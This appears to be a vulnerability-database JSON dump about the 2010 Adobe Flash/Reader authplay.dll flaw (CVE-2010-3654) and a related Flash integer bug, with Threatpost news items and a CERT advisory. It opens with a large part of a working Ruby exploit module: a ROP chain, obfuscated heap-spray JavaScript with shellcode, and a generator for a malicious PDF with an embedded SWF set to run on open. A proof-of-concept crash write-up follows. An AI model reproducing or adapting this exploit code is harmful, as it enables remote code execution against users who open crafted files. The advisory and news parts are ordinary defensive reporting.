ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack(&#39;V*&#39;)\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = &#39;&#39;\r\n\t\tpayload_buf &#60;&#60; stack_data\r\n\t\tpayload_buf &#60;&#60; encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( &#39;#{escaped_payload}&#39; );\r\nvar #{var_c} = #{var_unescape}( &#34;%&#34; + &#34;u&#34; + &#34;0&#34; + &#34;c&#34; + &#34;0&#34; + &#34;c&#34; + &#34;%u&#34; + &#34;0&#34; + &#34;c&#34; + &#34;0&#34; + &#34;c&#34; );\r\nwhile (#{var_c}.length + 20 + 8 &#60; #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length &#60; 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}&#60;0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+&#34;s&#34;;\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = &#34;&#34;\r\n\t\tcount.times do\r\n\t\t\tresult &#60;&#60; (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t&#34;%d 0 obj\\n&#34; % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t&#34;%d 0 R&#34; % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = &#34;&#34;\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase &#62;= &#39;A&#39; and c.upcase &#60;= &#39;Z&#39;\r\n\t\t\t\tresult &#60;&#60; &#34;#%x&#34; % c.unpack(&#34;C*&#34;)[0]\r\n\t\t\telse\r\n\t\t\t\tresult &#60;&#60; c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = &#34;&#34;\r\n\t\twhitespace = &#34;&#34;\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult &#60;&#60; whitespace &#60;&#60; &#34;%02x&#34; % b\r\n\t\t\twhitespace = &#34; &#34; * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult &#60;&#60; &#34;&#62;&#34;\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + &#34;.swf&#34;\r\n\r\n\t\txref = []\r\n\t\teol = &#34;\\n&#34;\r\n\t\tendobj = &#34;endobj&#34; &#60;&#60; eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = &#34;%PDF-1.5&#34; &#60;&#60; eol\r\n\t\t#pdf &#60;&#60; &#34;%&#34; &#60;&#60; RandomNonASCIIString(4) &#60;&#60; eol\r\n\r\n\t\t# catalog\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(1) &#60;&#60; nObfu(&#34;&#60;&#60;/Type/Catalog&#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Pages &#34;) &#60;&#60; ioRef(3)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/OpenAction &#34;) &#60;&#60; ioRef(5)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# pages array\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(3) &#60;&#60; nObfu(&#34;&#60;&#60;/Type/Pages/Count 1/Kids [&#34;) &#60;&#60; ioRef(4) &#60;&#60; nObfu(&#34;]&#62;&#62;&#34;) &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# page 1\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(4) &#60;&#60; nObfu(&#34;&#60;&#60;/Type/Page/Parent &#34;) &#60;&#60; ioRef(3)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Annots [&#34;) &#60;&#60; ioRef(7) &#60;&#60; nObfu(&#34;] &#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# js action\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(5) &#60;&#60; nObfu(&#34;&#60;&#60;/Type/Action/S/JavaScript/JS &#34;) + ioRef(6) + &#34;&#62;&#62;&#34; &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# js stream\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf &#60;&#60; ioDef(6) &#60;&#60; nObfu(&#34;&#60;&#60;/Length %s/Filter[/FlateDecode/ASCIIHexDecode]&#62;&#62;&#34; % compressed.length) &#60;&#60; eol\r\n\t\tpdf &#60;&#60; &#34;stream&#34; &#60;&#60; eol\r\n\t\tpdf &#60;&#60; compressed &#60;&#60; eol\r\n\t\tpdf &#60;&#60; &#34;endstream&#34; &#60;&#60; eol\r\n\t\tpdf &#60;&#60; endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(7) &#60;&#60; nObfu(&#34;&#60;&#60;/Type/Annot/Subtype/RichMedia&#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Rect [20 20 187 69] &#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/RichMediaSettings &#34;) &#60;&#60; ioRef(8)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/RichMediaContent &#34;) &#60;&#60; ioRef(9)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/NM (&#34;) &#60;&#60; swf_name &#60;&#60; nObfu(&#34;)&#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(8)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Type/RichMediaSettings/Subtype/Flash&#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Activation &#34;) &#60;&#60; ioRef(10)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Deactivation &#34;) &#60;&#60; ioRef(11)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# rich media content\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(9)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Type/RichMediaContent&#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Assets &#34;) &#60;&#60; ioRef(12)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Configurations [&#34;) &#60;&#60; ioRef(14) &#60;&#60; &#34;]&#34;\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(10)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Type/RichMediaActivation/Condition/PO&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(11)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Type/RichMediaDeactivation/Condition/XD&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(12)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Names [(#{swf_name}) &#34;) &#60;&#60; ioRef(13) &#60;&#60; nObfu(&#34;]&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(13)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Type/Filespec /EF &#60;&#60;/F &#34;) &#60;&#60; ioRef(16) &#60;&#60; nObfu(&#34;&#62;&#62; /F(#{swf_name})&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(14)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Type/RichMediaConfiguration/Subtype/Flash&#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Instances [&#34;) &#60;&#60; ioRef(15) &#60;&#60; nObfu(&#34;]&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(15)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Type/RichMediaInstance/Subtype/Flash&#34;)\r\n\t\tpdf &#60;&#60; nObfu(&#34;/Asset &#34;) &#60;&#60; ioRef(13)\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#62;&#62;&#34;)\r\n\t\tpdf &#60;&#60; eol &#60;&#60; endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref &#60;&#60; pdf.length\r\n\t\tpdf &#60;&#60; ioDef(16) &#60;&#60; nObfu(&#34;&#60;&#60;/Type/EmbeddedFile/Length %s&#62;&#62;&#34; % swf.length) &#60;&#60; eol\r\n\t\tpdf &#60;&#60; &#34;stream&#34; &#60;&#60; eol\r\n\t\tpdf &#60;&#60; swf &#60;&#60; eol\r\n\t\tpdf &#60;&#60; &#34;endstream&#34; &#60;&#60; eol\r\n\t\tpdf &#60;&#60; endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf &#60;&#60; &#34;xref&#34; &#60;&#60; eol\r\n\t\tpdf &#60;&#60; &#34;0 %d&#34; % (xref.length + 1) &#60;&#60; eol\r\n\t\tpdf &#60;&#60; &#34;0000000000 65535 f&#34; &#60;&#60; eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf &#60;&#60; &#34;%010d 00000 n&#34; % index &#60;&#60; eol\r\n\t\tend\r\n\r\n\t\tpdf &#60;&#60; &#34;trailer&#34; &#60;&#60; eol\r\n\t\tpdf &#60;&#60; nObfu(&#34;&#60;&#60;/Size %d/Root &#34; % (xref.length + 1)) &#60;&#60; ioRef(1) &#60;&#60; &#34;&#62;&#62;&#34; &#60;&#60; eol\r\n\r\n\t\tpdf &#60;&#60; &#34;startxref&#34; &#60;&#60; eol\r\n\t\tpdf &#60;&#60; xrefPosition.to_s() &#60;&#60; eol\r\n\r\n\t\tpdf &#60;&#60; &#34;%%EOF&#34; &#60;&#60; eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-71175", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:47", "description": "BUGTRAQ ID: 44504\r\nCVE ID: CVE-2010-3654\r\n\r\nFlash Player\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684FLASH\u64ad\u653e\u5668\u3002\r\n\r\nFlash Player\u7684authplay.dll\u5e93\u5728\u89e3\u6790\u7578\u5f62PDF\u6587\u4ef6\u65f6\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff0c\u7528\u6237\u53d7\u9a97\u6253\u5f00\u4e86\u5185\u5d4c\u6709\u6076\u610fFlash\u5185\u5bb9\u7684PDF\u6587\u4ef6\u65f6\u5c31\u53ef\u4ee5\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nAdobe Acrobat 9.4\r\nAdobe Flash Player 10.1.95.2\r\nAdobe Flash Player 10.1.85.3\r\nAdobe Reader 9.4\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728\u6d4f\u89c8\u5668\u4e2d\u7981\u7528Flash\uff0c\u7981\u6b62\u663e\u793aPDF\u6587\u6863\u3002\r\n\r\n* \u5728Adobe Reader 9\u4e2d\u7981\u7528Flash\u548c3D &amp; Multimedia\u652f\u6301\u3002\r\n\r\n* \u5728Adobe Reader\u548cAcrobat\u4e2d\u7981\u7528JavaScript\u3002\r\n\r\n* \u7981\u6b62Internet Explorer\u81ea\u52a8\u6253\u5f00PDF\u6587\u6863\u3002\r\n\r\n* \u5728Microsoft Windows\u4e2d\u542f\u7528DEP\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.adobe.com", "published": "2010-11-01T00:00:00", "type": "seebug", "title": "Adobe Flash Player authplay.dll\u5e93PDF\u6587\u4ef6\u89e3\u6790\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2010-11-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20218", "id": "SSV:20218", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:17:35", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Flash ActionIf Integer Denial of Service Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3639"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70138", "id": "SSV:70138", "sourceData": "\n Adobe Flash Integer Overflow \r\nAuthor: Matthew Bergin\r\nDate: June 15, 2010\r\nVersions Affected: Flash10e.ocx v10.0.45.2\r\n\t\t Flash10c.ocx v10.0.32.18 r32\r\nRoot Cause: ActionScript, &#34;ActionIf&#34;\r\nAffect: Denial-of-Service, possible Command Execution\r\nCVE: CVE-2010-3639\r\nDesc: When Parsing an ActionIf ActionScript statement four args are passed\r\n to the function, an integer named i , a ubyte named ActionCode, a ushort\r\n named Length, and a short named BranchOffset. If the BranchOffset is -305 or \r\n smaller it will cause an Access Violation when reading data from a \r\n invalid memory address. The last 16-bits of the address are controlable\r\n with the size of the BranchOffset argument. Any data which is in a valid\r\n segment of memory near the controlled address can be read causing Memory\r\n Disclosure. This would be used well in combination with a memory corruption\r\n vulnerability in order to bypass ASLR. \r\n\r\n In doing my initial research I found a lot of interesting things along the way.\r\n Flash10c is not vulnerable in the same way Flash10e is. I initially discovered\r\n the integer overflow in Flash10c while fuzzing SWF. I didnt fuzz it via a web\r\n browser but instead used a free application which uses the modules in a more\r\n direct manner. Flash10c is not able to be attacked via a browser as far as I\r\n have been able to tell. However, I have found during my research that Flash10e\r\n is loaded as a module when any Flash object is encountered. I am unsure as to\r\n if this is a configuration issue or not. In addition to this, while debugging\r\n this issue I found that both versions have a self-changing CRC which inhibits\r\n keeping break points set.\r\n\r\n Another interesting note is that when confirming the PoC on Flash Movie Player\r\n i noticed that if you open the file with the File -&#62; Open drop down menu, the\r\n PoC will not hit the vulnerable code causing a crash. However, if you register\r\n the swf extension to Flash Movie Player and &#34;double-click&#34; the PoC file to run\r\n it, Flash Movie Player will hit the vulnerable code every time. \r\n\r\n The PoC code would be best embedded into HTML for remote attacks but can be\r\n attacked in any manner in which Flash10c.ocx/Flash10e.ocx are loaded as modules\r\n into memory.\r\n\r\n\r\nFuzzed Application: EolSoft Flash Movie Player (downloads.cnet.com) v1.5\r\n\r\nCrash Details:\r\n\r\nAccess Violation\r\nException caught at 1009cb23 mov al,[eax+ecx]\r\nEAX:0267010c EBX:00e990b4 ECX:fffffef3 EDX:00e9b038\r\nESI:00e80000 EDI:00e990b0 ESP:0012f780 EBP:0012f99c\r\n\r\nReversing:\r\n\r\nstruct SWFTAG Tag[7], value DoAction\r\nstruct ACTIONRECORD ActionTag[6], value ActionIf, starts @ E3h size 5h\r\nint i, value 0\r\nubyte ActionCode, value 157\r\nushort Length, value 2\r\nshort BranchOffset, value -305\r\n\r\nBranchOffset is located @ E6h-E7h\r\n\r\nPoC: http://www.exploit-db.com/sploits/adobe_flash_int_ovrflw_poc.rar\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70138", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:06:38", "bulletinFamily": "info", "cvelist": ["CVE-2010-3654"], "description": "Adobe on Tuesday released an [emergency patch for several critical vulnerabilities in Adobe Reader](<http://blogs.adobe.com/psirt/2010/11/security-updates-released-for-adobe-reader-and-acrobat-apsb10-28.html>), including the [recent Adobe Flash bug](<https://threatpost.com/new-adobe-flash-bug-being-exploited-102810/>) and a separate flaw that was disclosed earlier this month. \n\nThe patch released Tuesday is outside of the company\u2019s normal quarterly update schedule for Reader and was released early because of ongoing attacks against some of the vulnerabilities being fixed. The Flash vulnerability was disclosed two weeks ago and Adobe pushed out a patch for Flash quickly. The Reader version of the vulerability took a while longer to fix.\n\n\u201cA \n[critical](<http://www.adobe.com/support/security/severity_ratings.html>) \nvulnerability has been identified\n\nin Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, \nLinux and Solaris; Adobe Flash Player 10.1.95.2 and earlier versions for \nAndroid; and the authplay.dll component that ships with Adobe Reader \n9.4 and earlier 9.x versions for Windows, Macintosh and UNIX, and Adobe \nAcrobat 9.4 and earlier 9.x versions for Windows \nand Macintosh. This vulnerability (CVE-2010-3654) could cause a crash \nand potentially allow an attacker to take control of the affected \nsystem,\u201d Adobe said in its advisory on the bug.\n\nOne of the other issues that Adobe fixed in Reader is a bug that can be used to cause a crash or denial of service. There are some reports that the flaw also can be used to execute remote code, although Adobe did not confirm that.\n", "modified": "2013-04-17T16:35:41", "published": "2010-11-16T19:41:53", "id": "THREATPOST:DAFE4C40F672DA84E11AC6FFC2BBB716", "href": "https://threatpost.com/adobe-releases-emergency-fix-critical-reader-flaws-111610/74678/", "type": "threatpost", "title": "Adobe Releases Emergency Fix for Critical Reader Flaws", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:44", "bulletinFamily": "info", "cvelist": ["CVE-2010-3654"], "description": "[](<https://threatpost.com/adobe-accelerates-patch-schedule-critical-flash-bug-110210/>)Adobe has moved up the release date for the patch for the [critical bug in Adobe Flash Player](<https://threatpost.com/new-adobe-flash-bug-being-exploited-102810/>) revealed last week, and now plans to have a fix ready on Thursday. The company still plans to patch Reader two weeks from now.\n\nThe vulnerability in Flash also exists in Reader and researchers said last week that attackers had already begun exploiting the bug in Reader by the time that Adobe acknowledged the problem and published an advisory. At the time of the initial advisory, Adobe officials said they planned to release a patch for Flash on Nov. 9 and for Reader on Nov. 15. \n\nOn Tuesday, the company updated its guidance, saying that the patch for Flash on Windows, Mac, Linux and Solaris will be pushed out on Thursday, Nov. 4, and that the fix for Flash on Android will still be published Nov. 9. The schedule for the Reader patch remains the same.\n\nA security researcher identified the Flash bug last Thursday and published a short explanation of it, which Adobe confirmed later in the day.\n\n\u201cA \n[critical](<http://www.adobe.com/support/security/severity_ratings.html>) \nvulnerability has been identified\n\nin Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, \nLinux and Solaris; Adobe Flash Player 10.1.95.2 and earlier versions for \nAndroid; and the authplay.dll component that ships with Adobe Reader \n9.4 and earlier 9.x versions for Windows, Macintosh and UNIX, and Adobe \nAcrobat 9.4 and earlier 9.x versions for Windows \nand Macintosh. This vulnerability (CVE-2010-3654) could cause a crash \nand potentially allow an attacker to take control of the affected \nsystem,\u201d Adobe said.\n\nThere were reports on Wednesday that another unpatched bug in Adobe\u2019s Shockwave software had been found, as well. Secunia posted an advisory saying that there\u2019s a [new use-after-free bug in Shockwave](<http://secunia.com/advisories/42112>) that can be exploited in certain Web-based attack scenarios. \n\n\u201cThe vulnerability is caused due to a use-after-free error in an \nautomatically installed compatibility component as a function in an \nunloaded library may be called,\u201d the Secunia advisory said. \u201cSuccessful exploitation allows execution of arbitrary code, but requires \nthat a user is tricked into opening the \u201cShockwave Settings\u201d window \nwhen viewing a web page.\u201d\n\nAdobe patched a previous vulnerability in Shockwave last week.\n", "modified": "2018-08-15T10:16:26", "published": "2010-11-02T19:15:03", "id": "THREATPOST:731A5A35EAC80BFED9629C1E359C6390", "href": "https://threatpost.com/adobe-accelerates-patch-schedule-critical-flash-bug-110210/74632/", "type": "threatpost", "title": "Adobe Accelerates Patch Schedule for Critical Flash Bug", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "bulletinFamily": "info", "cvelist": ["CVE-2010-3654"], "description": "[](<https://threatpost.com/new-adobe-flash-bug-being-exploited-102810/>)On the same day that it plans to release a [patch for a critical flaw in Shockwave](<http://blogs.adobe.com/psirt/2010/10/security-advisory-for-adobe-shockwave-player-apsa10-04.html>), Adobe confirmed on Thursday morning that there is a newly discovered bug in Flash that is being actively exploited already in attacks against Reader. The vulnerability affects Flash on all of the relevant platforms, including Android, as well as Reader on Windows and Mac, and won\u2019t be patched for nearly two weeks.\n\nThe new Flash bug came to light early Thursday when a researcher posted information about the problem, as well as a Trojan that is exploiting it and dropping a pair of malicious files on vulnerable PCs. Researcher [Mila Parkour tested the bug and posted a screenshot](<http://contagiodump.blogspot.com/2010/10/potential-new-adobe-flash-player-zero.html>) of the malicious files that a Trojan exploiting the vulnerability drops during its infection routine. Adobe has since confirmed the vulnerability and said that it is aware of the attacks against Reader.\n\n\u201cA \n[critical](<http://www.adobe.com/support/security/severity_ratings.html>) \nvulnerability has been identified\n\nin Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, \nLinux and Solaris; Adobe Flash Player 10.1.95.2 and earlier versions for \nAndroid; and the authplay.dll component that ships with Adobe Reader \n9.4 and earlier 9.x versions for Windows, Macintosh and UNIX, and Adobe \nAcrobat 9.4 and earlier 9.x versions for Windows \nand Macintosh. This vulnerability (CVE-2010-3654) could cause a crash \nand potentially allow an attacker to take control of the affected \nsystem,\u201d Adobe said.\n\nThis flaw is the latest is a string of bugs that have cropped up in Adobe products in the last few months. There have been a number of critical flaws exposed in Flash, Reader and other Adobe software, including one in the company\u2019s Shockwave application, which it is patching on Thursday. The Shockwave flaw is remotely exploitable and the details of it have been known publicly for some time. \n\nAdobe security officials said they plan to patch the Flash bug on Nov. 9 and will release a fix for Reader and Acrobat during the week of Nov. 15. \n", "modified": "2018-08-15T10:16:56", "published": "2010-10-28T14:03:47", "id": "THREATPOST:2606196DD3F3AF9E687F63426BF161F9", "href": "https://threatpost.com/new-adobe-flash-bug-being-exploited-102810/74617/", "type": "threatpost", "title": "New Adobe Flash Bug Being Exploited", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:07", "bulletinFamily": "info", "cvelist": ["CVE-2010-3654"], "description": "### Overview \n\nAdobe Flash 10.1.85.3 contains a vulnerability that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nAdobe Flash 10.1.85.3 and earlier versions as well as 10.2.161.23 and earlier 10.2 preview versions contain a vulnerability that can result in memory corruption, which can allow arbitrary code execution. Any application that supports Flash or provides its own runtime may be vulnerable. This vulnerability is being exploited in the wild. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), PDF file, Microsoft Office document, or any other document that supports embedded SWF content, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue is addressed in Adobe Flash 10.1.102.64. More details are available in Adobe Security Bulletin [APSB10-26](<http://www.adobe.com/support/security/bulletins/apsb10-26.html>). Adobe Reader and Acrobat 9.4.1 address this issue. More details are available in [APSB10-28](<http://www.adobe.com/support/security/bulletins/apsb10-28.html>). For other affected products, please see Adobe Security Bulletin [APSA10-05](<http://www.adobe.com/support/security/advisories/apsa10-05.html>) and consider the following workarounds: \n \n--- \n \n \n**Disable Flash in your web browser** \n \nDisable Flash or selectively enable Flash content as described in [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>). \n \n**Disable Flash and 3D &amp; Multimedia support in Adobe Reader 9** \n \nFlash and 3D &amp; Multimedia support are implemented as plug-in libraries in Adobe Reader. Disabling Flash in Adobe Reader will only mitigate attacks that use an SWF embedded in a PDF file. Disabling 3D &amp; Multimedia support does not directly address the vulnerability, but it does provide additional mitigation and results not in a crash but in a more user-friendly error message. \n \nTo disable Flash and 3D &amp; Multimedia support in Adobe Reader 9 on Microsoft Windows, delete or rename these files: \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\authplay.dll\"` \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\rt3d.dll\"` \nFor Apple Mac OS X, delete or rename these files: \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle\"` \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework\"` \nFor GNU/Linux, delete or rename these files (locations may vary among distributions): \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so\"` \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so\"` \nFile locations may be different for Adobe Acrobat or other Adobe products that include Flash and 3D &amp; Multimedia support. Disabling these plug-ins will reduce functionality and will not protect against SWF files hosted on websites. Depending on the update schedule for products other than Flash Player, consider leaving Flash and 3D &amp; Multimedia support disabled unless they are absolutely required. \n \n**Remove Flash** \n \nAdobe has provided a [TechNote](<http://kb2.adobe.com/cps/141/tn_14157.html>) with utilities for uninstalling the Flash Player plug-in and ActiveX control on Windows and Mac OS X systems. Removing these components can mitigate the web browser attack vector for this vulnerability. Note that this will not remove the instances of Flash Player that are installed with Adobe Reader or other Adobe products. \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript can help mitigate some techniques that use Adobe Reader as an attack vector. \n \nTo disable JavaScript in Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 